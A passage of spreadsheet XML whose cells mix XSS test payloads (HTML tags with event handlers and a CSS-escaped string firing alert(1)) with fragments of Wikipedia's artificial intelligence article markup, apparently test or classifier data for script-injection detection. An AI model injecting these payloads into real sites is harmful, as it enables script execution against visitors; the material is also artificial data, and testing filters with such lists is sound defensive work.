    <t>&lt;abbr oncut="alert(1)" contenteditable&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;h2&gt;Navigation menu &lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;hr onmouseup="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onpointerover=alert(1)&gt;XSS&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Configuration_space-129"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Configuration_space_129-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Configuration_space_129-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;iframe onmouseup="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmousemove="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-85"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-85"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;bgsound onmouseenter="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Other sources </t>
  </si>
  <si>
    <t>&lt;plaintext onclick="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;time id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onkeypress="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;button style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;param onpointerenter=alert(1)&gt;XSS&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">The definition used in this article, in terms of goals, actions, perception and environment, is due to &lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig (2003) &lt;/a&gt;. Other definitions also include knowledge and learning as additional criteria. </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;main onload=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="Commons page" src="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/12px-Commons-logo.svg.png" decoding="async" title="Commons page" width="12" height="16" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/18px-Commons-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/24px-Commons-logo.svg.png 2x" data-file-width="1024" data-file-height="1376" /&gt; &lt;b&gt;&lt;a href="https://commons.wikimedia.org/wiki/Category:Computer_science" class="extiw" title="commons:Category:Computer science"&gt;Commons &lt;/a&gt; &lt;/b&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;small onpointerup=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;head onmousedown="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;address id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;source draggable="true" ondragstart="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;kbd draggable="true" ondrag="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-255"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-255"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFSolomonoff1956" class="citation conference"&gt;&lt;a href="/wiki/Ray_Solomonoff" title="Ray Solomonoff"&gt;Solomonoff, Ray &lt;/a&gt; (1956). &lt;a rel="nofollow" class="external text" href="http://world.std.com/~rjs/indinf56.pdf"&gt;&lt;i&gt;An Inductive Inference Machine &lt;/i&gt; &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nav ondrop=alert(1) contenteditable&gt;drop here&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/sub&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-416"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-416"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;table onmouseleave="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;noscript id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;figure id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Qian_Xuesen" title="Qian Xuesen"&gt;Qian Xuesen &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;center id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;div id='mw-data-after-content'&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dir id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;base id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="//docs.scrapy.org/_/downloads/en/latest/epub/"&gt;epub&lt;/a&gt;&lt;/dd&gt;       </t>
  </si>
  <si>
    <t>&lt;summary draggable="true" ondragenter="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Dina Bass (20 September 2016). &lt;a rel="nofollow" class="external text" href="https://www.bloomberg.com/news/articles/2016-09-20/microsoft-develops-ai-to-help-cancer-doctors-find-the-right-treatments"&gt;"Microsoft Develops AI to Help Cancer Doctors Find the Right Treatments" &lt;/a&gt;. &lt;i&gt;Bloomberg.com &lt;/i&gt;. Bloomberg. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170511103625/https://www.bloomberg.com/news/articles/2016-09-20/microsoft-develops-ai-to-help-cancer-doctors-find-the-right-treatments"&gt;Archived &lt;/a&gt; from the original on 11 May 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Bloomberg.com&amp;amp;rft.atitle=Microsoft+Develops+AI+to+Help+Cancer+Doctors+Find+the+Right+Treatments&amp;amp;rft.date=2016-09-20&amp;amp;rft.au=Dina+Bass&amp;amp;rft_id=https%3A%2F%2Fwww.bloomberg.com%2Fnews%2Farticles%2F2016-09-20%2Fmicrosoft-develops-ai-to-help-cancer-doctors-find-the-right-treatments&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;div id="mw-head"&gt;    </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;area id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointerleave=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;2–3, who make the analogy with &lt;a href="/wiki/Aeronautical_engineering" class="mw-redirect" title="Aeronautical engineering"&gt;aeronautical engineering &lt;/a&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerleave=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerdown=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onblur=alert(1) id=x&gt;&lt;/textarea&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/svg&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onbeforepaste="alert(1)" contenteditable&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_artificial_intelligence" title="Philosophy of artificial intelligence"&gt;Artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-41"&gt;&lt;a href="#Law-related_professions"&gt;&lt;span class="tocnumber"&gt;7.6 </t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 onactivate=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onkeyup="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmouseout="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;script oncontextmenu="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;label onmousedown="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;u onbeforecopy="alert(1)" contenteditable&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;p onkeypress="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFDreyfusDreyfus1986"&gt;Dreyfus &amp;amp; Dreyfus 1986 &lt;/a&gt; (&lt;a href="/wiki/Hubert_Dreyfus" title="Hubert Dreyfus"&gt;Hubert Dreyfus &lt;/a&gt; is a philosopher and critic of AI who was among the first to argue that most useful human knowledge was encoded sub-symbolically. See &lt;a href="/wiki/Dreyfus%27_critique_of_AI" class="mw-redirect" title="Dreyfus&amp;#39; critique of AI"&gt;Dreyfus' critique of AI &lt;/a&gt;) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Unmanned_vehicle" title="Unmanned vehicle"&gt;Unmanned vehicle &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFWasonShapiro1966"&gt;Wason &amp;amp; Shapiro (1966) &lt;/a&gt; showed that people do poorly on completely abstract problems, but if the problem is restated to allow the use of intuitive &lt;a href="/wiki/Social_intelligence" title="Social intelligence"&gt;social intelligence &lt;/a&gt;, performance dramatically improves. (See &lt;a href="/wiki/Wason_selection_task" title="Wason selection task"&gt;Wason selection task &lt;/a&gt;) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;center onpointerover=alert(1)&gt;XSS&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;footer onpointerup=alert(1)&gt;XSS&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;video onpointerup=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;keygen onload=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpaste="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption ondblclick="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;button onmousemove="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onkeydown="alert(1)" contenteditable&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;figure onpointerdown=alert(1)&gt;XSS&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onkeydown="alert(1)" contenteditable&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/General_Problem_Solver" title="General Problem Solver"&gt;General Problem Solver &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;figcaption style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;progress draggable="true" ondragend="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Agent_architecture" title="Agent architecture"&gt;Agent architectures &lt;/a&gt;, &lt;a href="/wiki/Hybrid_intelligent_system" title="Hybrid intelligent system"&gt;hybrid intelligent systems &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFDreyfus1992" class="citation book"&gt;&lt;a href="/wiki/Hubert_Dreyfus" title="Hubert Dreyfus"&gt;Dreyfus, Hubert &lt;/a&gt; (1992). &lt;i&gt;What Computers  &lt;/i&gt;Still&lt;i&gt; Can't Do &lt;/i&gt;. New York: MIT Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-262-54067-4" title="Special:BookSources/978-0-262-54067-4"&gt;&lt;bdi&gt;978-0-262-54067-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=What+Computers+Still+Can%27t+Do&amp;amp;rft.place=New+York&amp;amp;rft.pub=MIT+Press&amp;amp;rft.date=1992&amp;amp;rft.isbn=978-0-262-54067-4&amp;amp;rft.aulast=Dreyfus&amp;amp;rft.aufirst=Hubert&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;noembed onclick="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup draggable="true" ondragenter="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmousemove="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;rp id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;command onpointerout=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onkeyup="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Each individual neuron is likely to participate in more than one concept. </t>
  </si>
  <si>
    <t>&lt;element id=x tabindex=1 onactivate=alert(1)&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onbeforecut="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=20" title="Edit section: Knowledge-based"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;samp oncopy="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;a href="/wiki/Hans_Moravec" title="Hans Moravec"&gt;Hans Moravec &lt;/a&gt;, who stated in 1988 that "it is comparatively easy to make computers exhibit adult level performance on intelligence tests or playing checkers, and difficult or impossible to give them the skills of a one-year-old when it comes to perception and mobility".</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;video id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;In fiction </t>
  </si>
  <si>
    <t>&lt;base ondblclick="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;element draggable="true" ondragend="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;map ondblclick="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;This is a form of &lt;a href="/wiki/Tom_M._Mitchell" title="Tom M. Mitchell"&gt;Tom Mitchell &lt;/a&gt;'s widely quoted definition of machine learning: "A computer program is set to learn from an experience &lt;i&gt;E &lt;/i&gt; with respect to some task &lt;i&gt;T &lt;/i&gt; and some performance measure &lt;i&gt;P &lt;/i&gt; if its performance on &lt;i&gt;T &lt;/i&gt; as measured by &lt;i&gt;P &lt;/i&gt; improves with experience &lt;i&gt;E &lt;/i&gt;." </t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;tr&gt;&lt;th style="padding:0.1em"&gt;Approaches &lt;/th&gt; &lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;output draggable="true" ondragenter="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Glossaries_of_science_and_engineering" title="Template:Glossaries of science and engineering"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Glossaries_of_science_and_engineering" title="Template talk:Glossaries of science and engineering"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Glossaries_of_science_and_engineering&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEAsadaHosodaKuniyoshiIshiguro2009-170"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEAsadaHosodaKuniyoshiIshiguro2009_170-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-154"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-154"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTELighthill1973-40"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTELighthill1973_40-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 onactivate=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;tt onpointerup=alert(1)&gt;XSS&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. For example, a feedforward network with six hidden layers can learn a seven-link causal chain (six hidden layers + output layer) and has a &lt;a href="/wiki/Deep_learning#Credit_assignment" title="Deep learning"&gt;"credit assignment path" &lt;/a&gt; (CAP) depth of seven&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotic_spacecraft" title="Robotic spacecraft"&gt;Robotic spacecraft &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;audio controls autoplay ontimeupdate=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;iframe draggable="true" ondragenter="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;meter id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;blink draggable="true" ondragenter="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;nobr ondblclick="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;form onbeforecopy="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;track oncut="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onmouseout="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Strong AI hypothesis </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFO&amp;#39;BrienMarakas2011" class="citation book"&gt;O'Brien, James; Marakas, George (2011). &lt;i&gt;Management Information Systems &lt;/i&gt; (10th ed.). McGraw-Hill/Irwin. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-07-337681-3" title="Special:BookSources/978-0-07-337681-3"&gt;&lt;bdi&gt;978-0-07-337681-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Management+Information+Systems&amp;amp;rft.edition=10th&amp;amp;rft.pub=McGraw-Hill%2FIrwin&amp;amp;rft.date=2011&amp;amp;rft.isbn=978-0-07-337681-3&amp;amp;rft.aulast=O%27Brien&amp;amp;rft.aufirst=James&amp;amp;rft.au=Marakas%2C+George&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;iframe onclick="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;output onmousedown="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=MIT+Technology+Review&amp;amp;rft.atitle=Boston+may+be+famous+for+bad+drivers%2C+but+it%27s+the+testing+ground+for+a+smarter+self-driving+car&amp;amp;rft.date=2017&amp;amp;rft.aulast=Knight&amp;amp;rft.aufirst=Will&amp;amp;rft_id=https%3A%2F%2Fwww.technologyreview.com%2Fs%2F608871%2Ffinally-a-driverless-car-with-some-common-sense%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;hr draggable="true" ondrag="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=60" title="Edit section: Machine consciousness, sentience and mind"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;dir draggable="true" ondragleave="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;footer style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=McKinsey+%26+Company&amp;amp;rft.atitle=Advanced+analytics+in+hospitality&amp;amp;rft.date=2017&amp;amp;rft_id=https%3A%2F%2Fwww.mckinsey.com%2Fbusiness-functions%2Fmckinsey-digital%2Four-insights%2Fadvanced-analytics-in-hospitality&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;i onbeforecut="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;colgroup onload=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li onbeforecopy="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerdown=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;ol onpointerup=alert(1)&gt;XSS&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;head onblur=alert(1) tabindex=1 id=x&gt;&lt;/head&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;tt id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;See all available exceptions and their meaning.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;input type=checkbox id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Taylor, Patrick. &lt;a rel="nofollow" class="external text" href="https://www.forbes.com/sites/forbestechcouncil/2018/05/01/the-robots-are-coming-to-corporate-finance/"&gt;"The Robots Are Coming To Corporate Finance" &lt;/a&gt;. &lt;i&gt;Forbes &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Forbes&amp;amp;rft.atitle=The+Robots+Are+Coming+To+Corporate+Finance&amp;amp;rft.aulast=Taylor&amp;amp;rft.aufirst=Patrick&amp;amp;rft_id=https%3A%2F%2Fwww.forbes.com%2Fsites%2Fforbestechcouncil%2F2018%2F05%2F01%2Fthe-robots-are-coming-to-corporate-finance%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
